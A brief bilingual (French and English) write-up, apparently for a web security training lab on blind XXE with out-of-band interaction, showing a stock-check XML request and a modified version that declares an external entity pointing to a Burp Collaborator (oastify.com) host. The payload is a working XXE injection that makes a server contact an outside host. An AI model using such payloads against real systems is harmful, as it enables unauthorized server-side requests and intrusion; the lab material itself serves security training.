XXE aveugle avec interaction out-of-band
Blind XXE with out-of-band interaction

Exploitation avec entité externe vers Burp Collaborator

Mis à jour


Mis à jour
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
<productId>
test
</productId>
<storeId>
1
</storeId>
</stockCheck><?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY myFile SYSTEM "https://h4m66g65x80x7bwj3ueflms990fr3hr6.oastify.com">]>
<stockCheck>
<productId>
&myFile;
</productId>
<storeId>
1
</storeId>
</stockCheck>